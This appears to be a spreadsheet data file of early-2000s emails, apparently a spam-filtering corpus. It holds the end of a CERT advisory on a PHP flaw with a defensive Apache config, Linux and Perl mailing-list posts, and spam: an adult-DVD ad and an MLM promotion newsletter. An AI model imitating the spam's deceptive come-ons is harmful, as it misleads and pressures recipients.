      In  the  Apache  web server, for example, this is possible with the
      following  code  included  in  the  main  configuration  file  or a
      top-level .htaccess file:
      &lt;Limit POST&gt;
         Order deny,allow
         Deny from all
      &lt;/Limit&gt;
      Note  that an existing configuration and/or .htaccess file may have
      parameters contradicting the example given above.
 Disable vulnerable service
    Until  you  can upgrade or apply patches, you may wish to disable PHP.
    As a best practice, the CERT/CC recommends disabling all services that
    are not explicitly required. Before deciding to disable PHP, carefully
    consider your service requirements.
 Appendix A. - Vendor Information
    This  appendix  contains  information  provided  by  vendors  for this
    advisory.  As  vendors  report new information to the CERT/CC, we will
    update this section and note the changes in our revision history. If a
    particular  vendor  is  not  listed  below, we have not received their
    comments.
 Apple Computer Inc.
           Mac  OS  X  and  Mac  OS X Server are shipping with PHP version
           4.1.2  which  does  not  contain the vulnerability described in
           this alert.
 Caldera
           Caldera  OpenLinux  does  not provide either vulnerable version
           (4.2.0,  4.2.1)  of  PHP  in their products. Therefore, Caldera
           products are not vulnerable to this issue.
 Compaq Computer Corporation
           SOURCE:  Compaq Computer Corporation, a wholly-owned subsidiary
           of  Hewlett-Packard  Company  and  Hewlett-Packard  Company  HP
           Services Software Security Response Team
           x-ref: SSRT2300 php post requests
           At  the  time  of  writing  this  document, Compaq is currently
           investigating   the   potential  impact  to  Compaq's  released
           Operating System software products.
           As  further  information  becomes available Compaq will provide
           notice  of  the  availability  of any necessary patches through
           standard  security bulletin announcements and be available from
           your normal HP Services supportchannel.
 Cray Inc.
           Cray, Inc. does not supply PHP on any of its systems.
 Debian
           Debian GNU/Linux stable aka 3.0 is not vulnerable.
           Debian GNU/Linux testing is not vulnerable.
           Debian GNU/Linux unstable is vulnerable.
           The  problem  effects PHP versions 4.2.0 and 4.2.1. Woody ships
           an  older  version  of  PHP  (4.1.2),  that doesn't contain the
           vulnerable function.
 FreeBSD
           FreeBSD  does not include any version of PHP by default, and so
           is  not  vulnerable; however, the FreeBSD Ports Collection does
           contain  the  PHP4  package. Updates to the PHP4 package are in
           progress  and a corrected package will be available in the near
           future.
 Guardian Digital
           Guardian  Digital  has not shipped PHP 4.2.x in any versions of
           EnGarde, therefore we are not believed to be vulnerable at this
           time.
 Hewlett-Packard Company
           SOURCE:  Hewlett-Packard Company Security Response Team
           At  the  time  of  writing  this  document,  Hewlett Packard is
           currently  investigating  the potential impact to HP's released
           Operating System software products.
           As further information becomes available HP will provide notice
           of  the  availability of any necessary patches through standard
           security  bulletin  announcements  and  be  available from your
           normal HP Services support channel.
 IBM
           IBM  is  not vulnerable to the above vulnerabilities in PHP. We
           do  supply the PHP packages for AIX through the AIX Toolbox for
           Linux  Applications.  However,  these packages are at 4.0.6 and
           also incorporate the security patch from 2/27/2002.
 Mandrakesoft
           Mandrake Linux does not ship with PHP version 4.2.x and as such
           is  not  vulnerable.  The  Mandrake Linux cooker does currently
           contain  PHP  4.2.1  and  will  be  updated shortly, but cooker
           should  not be used in a production environment and no advisory
           will be issued.
 Microsoft Corporation
           Microsoft  products  are not affected by the issues detailed in
           this advisory.
 Network Appliance
           No Netapp products are vulnerable to this.
 Red Hat Inc.
           None  of  our commercial releases ship with vulnerable versions
           of PHP (4.2.0, 4.2.1).
 SuSE Inc.
           SuSE Linux is not vulnerable to this problem, as we do not ship
           PHP 4.2.x.
      _________________________________________________________________
    The  CERT/CC acknowledges e-matters GmbH for discovering and reporting
    this vulnerability.
      _________________________________________________________________
    Author: Ian A. Finlay.
    ______________________________________________________________________
    This document is available from:
    http://www.cert.org/advisories/CA-2002-21.html
    ______________________________________________________________________
 CERT/CC Contact Information
    Email: cert@cert.org
           Phone: +1 412-268-7090 (24-hour hotline)
           Fax: +1 412-268-6989
           Postal address:
           CERT Coordination Center
           Software Engineering Institute
           Carnegie Mellon University
           Pittsburgh PA 15213-3890
           U.S.A.
    CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
    EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
    during other hours, on U.S. holidays, and on weekends.
 Using encryption
    We  strongly  urge you to encrypt sensitive information sent by email.
    Our public PGP key is available from
    http://www.cert.org/CERT_PGP.key
    If  you  prefer  to  use  DES,  please  call the CERT hotline for more
    information.
 Getting security information
    CERT  publications  and  other security information are available from
    our web site
    http://www.cert.org/
    To  subscribe  to  the CERT mailing list for advisories and bulletins,
    send  email  to majordomo@cert.org. Please include in the body of your
    message
    subscribe cert-advisory
    *  "CERT"  and  "CERT  Coordination Center" are registered in the U.S.
    Patent and Trademark Office.
    ______________________________________________________________________
    NO WARRANTY
    Any  material furnished by Carnegie Mellon University and the Software
    Engineering  Institute  is  furnished  on  an  "as is" basis. Carnegie
    Mellon University makes no warranties of any kind, either expressed or
    implied  as  to  any matter including, but not limited to, warranty of
    fitness  for  a  particular purpose or merchantability, exclusivity or
    results  obtained from use of the material. Carnegie Mellon University
    does  not  make  any warranty of any kind with respect to freedom from
    patent, trademark, or copyright infringement.
      _________________________________________________________________
    Conditions for use, disclaimers, and sponsorship information
    Copyright 2002 Carnegie Mellon University.
    Revision History
 July 22, 2002:  Initial release
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 6.5.8
 iQCVAwUBPTyOVqCVPMXQI2HJAQGK6QQAp1rR7K18PNxpQZvqKPYWxyrtpiT8mmKN
 UuyERmOoX+5MAwH0hbAWCvVcyLH0gKGbTpBkRgToT8IEHZojwHCzqOaMM9kni/FG
 QEVeznLfBX4GIgZGPu0XWlph3ZqaayWln57eGueYZ26zBuriIUu2cUCmyYGQkqlI
 tuZdnDqUmR0=
 =+829
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Adult Videos To: yyyy@netnoteinc.com ID: vtyp
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
 ############################################
 #                                          #
 #       Adult Online Super Store           #
 #              Shhhhhh...                  #
 #     You just found the Internet's        #
 #          BEST KEPT SECRET!!!             #
 #    3 Vivid DVDs Absolutely FREE!!!       #
 #                                          #
 ############################################
 If you haven't seen it yet... we are offering a
 new weekly selection absolutely FREE Adult DVDs
 AND VIDEOS NO PURCHASE NECESSARY!!!!!
  GO TO: http://209.203.162.20/8230/
 Everything must go!!! Additional Titles as
 low as $6.97
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 ############################################
 #                                          #
 #  Don't forget to forward this email to   #
 #  all your friends for the same deal...   #
 #  There is a new free DVD and VHS video   #
 #  available every week for your viewing   #
 #  pleasure.                               #
 #                                          #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http://209.203.162.20/optout.html 
 . Please allow 24 hours for removal.
 This e-mail is sent in compliance with the Information Exchange Promotion 
 and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
 'removal' instruction.
 axnaefpgdoyeffbpbfq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Backup solutions
</t>
  </si>
  <si>
    <t xml:space="preserve">Brian ODonoghue said:
 &gt;
 &gt;
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: Ciaran Johnston [mailto:cj@nologic.org]
 &gt;&gt; Sent: 16 August 2002 15:09
 &gt;&gt; To: ilug@linux.ie
 &gt;&gt; Subject: [ILUG] Backup solutions
 &gt;&gt;
 &gt;&gt; Hi folks,
 &gt;&gt; I maintain a colocated server on behalf of a small group of
 &gt;&gt; individuals, and am looking at backup solutions. Is it possible to get
 &gt;&gt; some sort of low-
 &gt;&gt; end internal tape / other solution that could be used to back up
 &gt;&gt; approx. 40
 &gt;&gt; Gigs of data or am I just dreaming? My ISP does offer backups at extra
 &gt;&gt; cost
 &gt;&gt; but the only problem with that is, well, the extra cost.
 &gt;&gt;
 &gt;&gt; What I was hoping to do was to install some kind of internal tape
 &gt;&gt; device, then swap tapes round every month, so I had an onsite backup
 &gt;&gt; of say the last 24 hours and an offsite backup of the last month. Is
 &gt;&gt; this feasible? I'm beginning to think it isn't. External devices are
 &gt;&gt; not an option as part
 &gt;&gt; of the charge for colocation is rackspace.
 &gt;&gt;
 &gt;&gt; Thanks,
 &gt;&gt; Ciaran.
 &gt;
 &gt; I'd recommend a good external DLT drive.
 &gt; You will probably need a SCSI card for that too.
 Yeah, so would I, but as I said, external ain't really an option.
 /Ciaran.
 &gt;
 &gt; Mmmm.
 &gt;
 &gt; --
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
 &gt; information. List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bug report: msg n+1 marked read
</t>
  </si>
  <si>
    <t xml:space="preserve">
 It seems that something changed during the last 3-4 weeks.
 1) In a folder, msgs 1-n is read, n=current, n upwards is unread.
 2) change to another folder
 3) change back to the original folder and you'll see msg n+1 being 
 highlighted as current for a split second, that it changes back to 
 n=current.
 Kind of annoying since it marks msg n+1 as read.
 /Anders
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-09
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Damian Conway to speak in London
     * Meeting in Budapest
 +--------------------------------------------------------------------+
 | Damian Conway to speak in London                                   |
 |   posted by ziggy on Thursday August 08, @15:21 (damian)           |
 |   http://use.perl.org/article.pl?sid=02/08/08/1923211              |
 +--------------------------------------------------------------------+
 [0]blech writes "Damian Conway will be coming to London in August, and
 he'll be speaking at a couple of special [1]London.pm meetings, at the
 approprately named [2]Conway Hall in [3]Central London.
 The first is [4]Life, the Universe and Everything on Tuesday 27th August,
 and the second is [5]Perl 6 Prospective on Thursday 29th August. Both
 start at 6.30 pm sharp, so we can fit in the maximum possible
 Damian-ness.
 We hope to see you there!"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/08/1923211
 Links:
     0. http://london.pm.org/
     1. http://london.pm.org/meetings/
     2. http://www.conwayhall.org.uk/
     3. http://www.streetmap.co.uk/streetmap.dll?G2M?X=530661&amp;Y=181764&amp;A=Y&amp;Z=1
     4. http://www.yetanother.org/damian/seminars/Life.html
     5. http://www.yetanother.org/damian/seminars/Perl6.html
 +--------------------------------------------------------------------+
 | Meeting in Budapest                                                |
 |   posted by ziggy on Thursday August 08, @17:24 (groups)           |
 |   http://use.perl.org/article.pl?sid=02/08/08/1927253              |
 +--------------------------------------------------------------------+
 [0]Gabor Szabo writes "We are organizing a meeting for Perl users in
 Budapest. We'll meet on 26th August at 17:00 at a location we'll announce
 within a few days on [1]our mailing list. Planned agenda: How to raise
 camels on the Hungarian Puszta.
 You can read more details (in Hungarian) [2]here. Non Hungarians who
 happen to be in the area are also welcome, though the presentation(s)
 will be given in Hungarian."
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/08/1927253
 Links:
     0. mailto:gabor@tracert.com
     1. http://www.atom.hu/mailman/listinfo/perl
     2. http://www.atom.hu/pipermail/perl/2002-August/001150.html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</si>
  <si>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Your Membership Exchange
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --1074482631.993802752000.JavaMail.RovAdmin.rovweb002
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Exchange, Issue #423 (June 28, 2001)
 Your place to exchange ideas, ask questions, swap links, and share your skills! 
 You are a member in at least one of these programs 
 - You should be in them all! 
 &lt;a href="BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;&lt;br&gt;
 &lt;a href="SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;&lt;br&gt;
 &lt;a href="SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;
 &lt;p&gt;______________________________________________________&lt;br&gt;
 Today's Special Announcement:&lt;p&gt;
 I'll Put Your Ad on 2,000 Sites FREE! Free This Week Only, 
 Just For Our Subscribers! Learn the secrets of marketing 
 online on this global FREE teleseminar. Limited lines 
 available, only three time slots available... reserve today. 
 You will not be disappointed! I'll be your personal host. 
 We operate several sites, all successful. I'll teach you what 
 to do and how to do it! Click here: 
 &lt;a href="http://bannerco-op.com/freeseminar/ezine"&gt;FREE Teleseminar&lt;/a&gt;
 Michael T. Glaspie - Founder 
 ______________________________________________________&lt;br&gt;
 We apologize for any technical problems you may have had with
 our last mailing, we are working hard to ensure that such problems 
 will not occur again.&lt;p&gt;
 In This Issue:&lt;p&gt;
 &lt;b&gt;&gt;&gt; Q &amp; A &lt;/b&gt;&lt;br&gt;
 &lt;b&gt;    QUESTIONS: &lt;/b&gt;&lt;br&gt;
      - Using pictures as links? &lt;br&gt;
 &lt;b&gt;    ANSWERS: &lt;/b&gt;&lt;br&gt;
      - Unblocking sites so I can access? &lt;br&gt;
        Z. OConan: Access using a proxy &lt;br&gt;
        G. Bendickson: Using A Proxy To Visit Blocked Sites &lt;p&gt;
 &lt;b&gt;&gt;&gt; MEMBER SHOWCASES&lt;/b&gt; &lt;p&gt;
 &lt;b&gt;&gt;&gt; MEMBER *REVIEWS* &lt;/b&gt;&lt;br&gt;
      - Sites to Review: #124, #125 &amp; #126! &lt;br&gt;
      - Site #123 Reviewed! &lt;br&gt;
      - Vote on Your Favorite Website Design! &lt;br&gt;
 &lt;p&gt;
 ______________________________________________________&lt;br&gt;
 &lt;b&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt; &lt;/b&gt;&lt;p&gt;
 &lt;i&gt;Do you a burning question about promoting your website, html design, 
 or anything that is hindering your online success? Submit your questions
 to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput&lt;/a&gt;&lt;br&gt;Are you net savvy? Have you learned from your own trials and errors and 
 are willing to share your experience? Look over the questions each day, 
 and if you have an answer or can provide help, post your answer to 
 &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;  Be sure to include your signature 
 file so you get credit (and exposure to your site). &lt;/i&gt;&lt;p&gt;
 &lt;b&gt;QUESTIONS: &lt;/b&gt;&lt;p&gt;
 From: moviebuff@cliffhanger.com &lt;br&gt;
 Subject: Using pictures as links &lt;p&gt;
 I'm changing my website and want to use pictures for the links to other pages. 
 But, someone told me I should still put a 'click here' underneath all the 
 pictures. To me, this removes all purpose of using the pictures.  &lt;p&gt;
 How can I get across that you click on the pictures to get to other pages 
 without coming right out and saying so? For example, I have a page with 
 actor and actress information and just want to have a picture of my 
 favorite stars to click on and change the picture every couple of days. &lt;p&gt;
 Mark &lt;br&gt;
 moviebuff@cliffhanger.com &lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;ANSWERS:&lt;/b&gt;&lt;p&gt;
 From: Zaak  - Zaako@linkpaks.com &lt;br&gt;
 Subject: Access using a proxy &lt;p&gt;
 &gt;From: CJ  (cj5000@post.com) &lt;br&gt;
 &gt;Subject: Unblocking sites so I can access? (Issue #422) &lt;p&gt;
 --&gt; I am currently living in a place where the ISP is 
 blocking 50% of 
 the web. I was told by someone that you can unblock these web sites by 
 using a proxy, but I don't know what that means. I am wondering is 
 there a way to get access to these sites? -- &lt;br&gt;
 &lt;p&gt;
 A proxy is easy to use if you use someone elses, they can be tricky to setup yourself. 
 I have had very good results with Surfola. Basically you surf to their servers and then 
 from there you surf Through/From their servers. I have several places I surf from that 
 block content. Surfola easily bypasses them! Its also Free! You can also make money 
 with them but I just use them to bypass anal retentive ISP/Corporate providers and 
 because they allow me to surf anonymously! &lt;p&gt;
 I have a detailed right-up on them at &lt;a href="http://linkpaks.com/paidtosurf/Surfola.php"&gt; http://linkpaks.com/paidtosurf/Surfola.php &lt;/a&gt;
 See there for more info. If anything is not clear feel free to ask. 
 (Email &amp; Sign-up Links on http://linkpaks.com/paidtosurf/Surfola.php page) &lt;p&gt;
 Zaak OConan &lt;br&gt;
 Netrepreneur &lt;br&gt;
 &lt;a href="Http://LinkPaks.com"&gt;Http://LinkPaks.com&lt;/a&gt; - Surf &amp; Earn Guides &lt;br&gt;
 &lt;a href="Http://LinktoCash.com"&gt;Http://LinktoCash.com&lt;/a&gt; - Internet Businesses for under $100 &lt;br&gt;
 &lt;a href="Http://ITeam.ws"&gt;Http://ITeam.ws&lt;/a&gt; - The Hottest Product on the Net Today &lt;p&gt;
 ++++ &lt;b&gt;Next Answer - Same Question&lt;/b&gt; ++++ &lt;p&gt;
 From: Wyn Publishing - wynpublishing@iname.com &lt;br&gt;
 Subject: Using A Proxy To Visit Blocked Sites &lt;p&gt;
 &gt;From: CJ  (cj5000@post.com) &lt;br&gt;
 &gt;Subject: Unblocking sites so I can access? (Issue #422) &lt;p&gt;
 CJ, &lt;p&gt;
 Two such sites that allows proxy surfing are: &lt;br&gt;
 http://www.anonymise.com and
 http://www.anonymizer.com . &lt;p&gt;
 However, if you cannot get to that site then obviously it will not work. 
 Also note, that if your ISP is dictating to you which sites you may or 
 may not visit, then it is time to change providers! &lt;p&gt;
 Gregory Bendickson, Wyn Publishing &lt;br&gt;
 Over 28 Free Traffic exchange services reviewed in a fully &lt;br&gt;
 customizable e-book. Download yours free and get multiple &lt;br&gt;
 signups while learning the art of free web traffic! &lt;br&gt;
 &lt;a href="http://www.trafficmultipliers.com"&gt;http://www.trafficmultipliers.com&lt;/a&gt; &lt;p&gt; 
 ______________________________________________________ &lt;p&gt;
 &gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;WEBSITE SHOWCASES&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt; &lt;p&gt;
 &lt;i&gt;Examine carefully - those with email addresses included WILL 
 trade links with you, you are encouraged to contact them. And, there 
 are many ways to build a successful business. Just look at these 
 successful sites/programs other members are involved in... &lt;/i&gt;&lt;p&gt;
 ----------------------------------------------------- &lt;p&gt;
 "It's The Most D-A-N-G-E-R-O-U-S Book on the Net"
 Email 20,000 Targeted Leads Every Single Day! Slash Your 
 Time Online to just 1-2 Hours Daily! Build 11 Monthly Income 
 Streams Promoting ONE URL! Start building YOUR Business - 
 NOT everyone elses! &lt;a href="http://www.roibot.com/w.cgi?R8901_bd_shwc"&gt; http://www.roibot.com/w.cgi?R8901_bd_shwc&lt;/a&gt; &lt;br&gt;
 ----------------------------------------------------- &lt;p&gt;
 Is your website getting traffic but not orders?
 Profile, Analyze, Promote, and Track your site to 
 get the results you want. Fully Guaranteed!
 Free Trial Available! &lt;a href="http://www.roibot.com/w.cgi?R4887_saa"&gt; http://www.roibot.com/w.cgi?R4887_saa&lt;/a&gt; &lt;br&gt;
 ------------------------------------------------------&lt;p&gt;
 OVER 7168 SITES TO PLACE YOUR FREE AD! 
 Get immediate FREE exposure on thousands of sites. 
 Plus two FREE programs that will AUTOMATICALLY type 
 your ad for you! Pay one time, promote all the time.
 &lt;a href="http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932"&gt; http://www.hitekhosting.net/cgi-bin/club_click.cgi?ID2932&lt;/a&gt; &lt;br&gt;
 ----------------------------------------------------- &lt;p&gt;
 &lt;i&gt;If you have a product, service, opportunity and/or quality 
 merchandise that appeals to people worldwide, reach your 
 target audience! 
 For a fraction of what other large newsletters charge you 
 can exhibit your website here for only $8 CPM. Why?... 
 Because as a valuable member we want you to be successful! 
 Order today - Exhibits are limited and published on a 
 first come, first serve basis. &lt;/i&gt;&lt;a href="http://bannersgomlm.com/ezine"&gt; http://bannersgomlm.com/ezine &lt;/a&gt; &lt;br&gt;
 &lt;p&gt;
 ______________________________________________________&lt;br&gt;
 &gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;MEMBER *REVIEWS*&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;p&gt;
 &lt;i&gt;Visit these sites, look for what you like and any suggestions 
 you can offer, and send your critique to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt; 
 And, after reviewing three sites, your web site will be added to 
 the list! It's fun, easy, and it's a great opportunity to give 
 some help and receive an informative review of your own site. 
 Plus, you can also win a chance to have your site chosen for 
 a free website redesign. One randomly drawn winner each month! &lt;/i&gt;&lt;p&gt;
 &lt;b&gt;SITES TO REVIEW:&lt;/b&gt;&lt;p&gt;
 Site #124: &lt;a href="http://www.BestWayToShop.com"&gt;http://www.BestWayToShop.com&lt;/a&gt;&lt;br&gt;
 Dale Pike &lt;br&gt;
 rhinopez@aol.com &lt;p&gt;
 Site #125: &lt;a href="http://www.wedeliverparties.com"&gt;http://www.wedeliverparties.com&lt;/a&gt;&lt;br&gt;
 Dawn Clemons &lt;br&gt;
 dclemons7@home.com &lt;p&gt;
 Site #126: &lt;a href="http://www.EClassifiedshq.com"&gt;http://www.EClassifiedshq.com&lt;/a&gt; &lt;br&gt;
 Carol Cohen &lt;br&gt;
 Opp0rtunity@aol.com &lt;p&gt; 
 &lt;b&gt;SITE REVIEWED:&lt;/b&gt;&lt;p&gt;
 Comments on Site #123: &lt;a href="http://netsbestinfo.homestead.com/nbi.html"&gt;http://netsbestinfo.homestead.com/nbi.html&lt;/a&gt;&lt;br&gt;
 Dennis &lt;br&gt;
 damorganjr@yahoo.com&lt;br&gt;
 ~~~~&lt;p&gt;
 I reviewed site 123 and found the size of the font to be too aggressive and 
 I don't like mustard yellow for a background. Also in the second or third 
 paragraph is a misspelled word which should be "first-come" not as 
 shown on the page.&lt;p&gt;
 I feel a sample of the type of information offered in the newsletter should 
 be displayed on the page as well as a sample of the free ads offered 
 on the site. I will probably submit a free ad just to see the content of the newsletter.  &lt;p&gt;
 As has been mentioned many times, some information about the person 
 doing the page is always good.  We need some information about 
 why this newsletter will be worthwhile to subscribe to. &lt;br&gt;
 ~~~~&lt;p&gt;
 Dennis - I took a look at your site, and have recommendations 
 for improving your page.&lt;br&gt;
 1- I use Internet Explorer and view web pages with my text size set to 
 'smaller'. The text you used was quite large, like a font used for a heading 
 for all the text. By making the text size smaller it wouldn't feel like 
 you were screaming at me. Also, the background was just too much.&lt;br&gt;
 2- There were spelling errors in the text. Often it might be difficult for you 
 to spot these yourself if you see the page all the time, but have a friend 
 look it over. Spelling errors make the page look unprofessional.&lt;br&gt;
 3- Offer a sample of your newsletter so people can see what it looks like 
 before they subscribe. Also, if you are asking for a person to give you 
 their email address, you MUST have a privacy policy and let them know 
 they can unsubscribe.&lt;br&gt;
 4- Think about adding a form for people to subscribe to the newsletter. 
 It looks more professional than just offering an email address to send to.&lt;br&gt;
 5- Offer information about yourself, and the kinds of information your 
 newsletter contains. Maybe extend your site to include back issues or 
 an archive to see what information you have offered in the past.&lt;br&gt;
 6- Build another page for 'sponsoring info' and put prices on that 
 page. Remove all pricing information from the home page.&lt;br&gt;
 ~~~~&lt;p&gt;
 I feel that the background is a little too bold and busy for the text. 
 I also believe that the text is too large which makes it difficult to read 
 quickly, and forces the reader to scroll down unnecessarily. 
 I noticed some spelling errors, and I think that a link to the classifieds 
 site should be provided, and online payments should be accepted. 
 A site that sells advertising should have advertisments on it!&lt;br&gt;
 ~~~~&lt;p&gt;
 This is a very clear site with nothing interfering with the 
 message.  I did not like the background colour, however that is 
 personal, it did not detract from the information.  I was tempted 
 to sign up for the newsletter but would have liked a link to see 
 a current issue. There was an error in the wording (a word 
 missed) which needs correction and I think the fonts could be 
 smaller. Overall a non-confusing site which makes a nice change. *cheers*&lt;br&gt;
 ~~~~&lt;p&gt;
 Could use a better background and the fonts are very large, there also 
 are errors in the following paragraphs : 
 "first com-first serve" and "to place a sponsor advertisement, 
 send your to my email"&lt;br&gt;
 ~~~~&lt;p&gt;
 A single page site. It is necessary to subscribe to the webmaster's 
 newsletter to see what he's doing, and it doesn't seem to me to be 
 a way to get people to visit. I wouldn't, for example. He claims to 
 have lots of tidbits of information that, he says, we probably 
 didn't know, and this is possible, but in my opinion, he would be 
 better served if he at least put some of the things out there for 
 all to see - when the appetite, so to speak, if he want people to 
 subscribe. As it is, I would not bother.&lt;br&gt;
 ~~~~&lt;p&gt;
 What does one expect from a site like netsbestinfo? Some useful 
 resources and some useful tips and also some forms of easy 
 advertisement on the net. But what we get here is a newsletter 
 with the owner (whose email reads damorgarjr@yahoo.com) 
 asking us to subscribe us to his newsletter for a free 4-line ad. 
 He also tells of paid category of advertisements. This is all we get 
 from a site which has a grand title. Even the information about 
 the newsletter is hardly impressive and is presented in about 35-to-40 
 points size which gets difficult to read. &lt;br&gt;
 ~~~~&lt;p&gt;
 A neat enough site but the background could be a little hard on 
 the eyes. There is only really one problem with this page - its 
 just an advertisement for a newsletter. No, scratch that, its an 
 advertisement to place free ads in a newsletter. A bold enough 
 move perhaps but I learned hardly anything about the newsletter 
 itself and immediately started worrying about getting a flood of 
 ads to my email account so I didn't even subscribe. Presumably 
 you'd want to get people to sign up so might I suggest splitting 
 the page into the newsletter itself, perhaps a sample issue, 
 a privacy policy and a promise not to drown in ads and then click 
 for more info on your free ads. &lt;p&gt;
 ________________________________________&lt;br&gt;
 &lt;b&gt;VOTE ON YOUR FAVORITE WEBSITE DESIGN!&lt;/b&gt;&lt;br&gt;
 Help out the winner of the free website redesign by voting for 
 YOUR favorite!  &lt;p&gt;
 You can help out Teddy at &lt;a href="http://www.links4profit.com"&gt; links4profit.com&lt;/a&gt; by taking a 
 look at his site, then checking out the three new layouts Jana of 
 AkkaBay Designs &lt;a href="http://AkkaBay.com"&gt;AkkaBay.com&lt;/a&gt; has designed specifically 
 for him.  After you've visited all three, vote for your favorite. 
 To make this as easy as possible for you, just click on the e-mail 
 address that matches your choice - you do not need to enter 
 any information in the subject or body of the message.&lt;p&gt;
 I have included a note from Jana, and the links to Teddy's  
 current site along with the three new designs:&lt;p&gt;
 &gt;From Jana: The pages have been created as non-frame pages 
 although with minor modification, the pages could be adapted 
 for use in a frames environment&lt;p&gt;
 Please take a look at the existing site: &lt;a href="http://www.links4profit.com"&gt;http://www.links4profit.com&lt;/a&gt;&lt;p&gt;
 Here are the 3 redesigns: &lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index.html"&gt;http://AkkaBay.com/links4profit/index.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design1@AEOpublishing.com"&gt;design1@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index2.html"&gt;http://AkkaBay.com/links4profit/index2.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design2@AEOpublishing.com"&gt;design2@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://AkkaBay.com/links4profit/index3.html"&gt;http://AkkaBay.com/links4profit/index3.html&lt;/a&gt;&lt;br&gt;
 Vote for this design:  &lt;a href="mailto:design3@AEOpublishing.com"&gt;design3@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 You will have all of this week to vote (through June 29), and 
 we'll list the favorite and most voted for layout next week.  
 Teddy of course will be able to choose his favorite, and 
 colors, font style/size, backgrounds, textures, etc, can all 
 easily be changed on the "layout" that he likes. 
 &lt;p&gt;
 Free website re-designs and original graphics are provided to 
 FLN Showcase winners courtesy of AkkaBay Designs. 
 &lt;a href="http://AkkaBay.com"&gt; http://AkkaBay.com &lt;/a&gt;&lt;p&gt;
 If you have any questions about how this works or how you can 
 participate, please email Amy at &lt;a href="mailto:Moderator@AEOpublishing.com&gt; Moderator &lt;/a&gt;&lt;p&gt; 
 ______________________________________________________&lt;br&gt;
 moderator:Amy Mossel &lt;br&gt;
 posting: &lt;a href="MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 ______________________________________________________&lt;br&gt;
 ______________________________________________________&lt;br&gt;
 Send posts and questions (or your answers) to:&lt;br&gt;
   &lt;a href="MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 Please send suggestions and comments to:&lt;br&gt;
   &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;&lt;p&gt;
 To change your subscribed address, send both new 
 and old address to &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;&lt;br&gt;
 See below for unsubscribe instructions.&lt;br&gt;
 Copyright 2001 AEOpublishing &lt;br&gt;
 -----End of Your Membership Exchange&lt;p&gt;
 ------------------------------------------------
 ------------------------------------------------
